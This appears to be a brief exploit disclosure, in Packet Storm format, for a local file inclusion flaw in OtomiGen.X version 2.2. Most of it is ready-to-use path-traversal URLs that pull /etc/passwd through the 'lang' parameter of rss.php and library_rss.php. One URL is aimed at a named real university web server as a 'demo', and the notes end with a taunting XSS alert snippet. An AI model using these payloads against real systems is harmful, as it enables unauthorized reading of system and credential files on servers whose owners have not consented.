OtomiGen.X version 2.2 suffers from local file inclusion vulnerabilities.
fa7c1a59ef6bd0557d669bb4afb407d16fa0c6593befbcc6a9eeb29d2b25e955[+] Author: Saime
[+] Script: OtomigenX v2.2 (lang) Local File Inclusion
[+] URL: http://kmrg.itb.ac.id/otomigenx/?menu=download
[+] Date: 28/05/2008
[+] Greetz: BaKo,DrWh4x,optiplex,xprog,cam-man-dan,Tulle,t0pP8uZz,Inspiratio,Novalok,illuz1oN,Untamed,GM,str0ke, and everyone else I forgot!
[+] Site: http://h4ck-y0u.org
[+] File: library_rss.php/rss.php
[+] Exploit:
http://localhost/otomigenx/rss.php?lang=../../etc/passwd
http://localhost/otomigenx/library_rss.php?lang=../../etc/passwd
[+] Demo:
http://kmrg.itb.ac.id/otomigenx/library_rss.php?lang=../../../../../etc/passwd
[+] Notes: Don, hows the threaded version going? lololol ( javascript:alert('noob'); ) or should it be plain xss? LOLOL
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed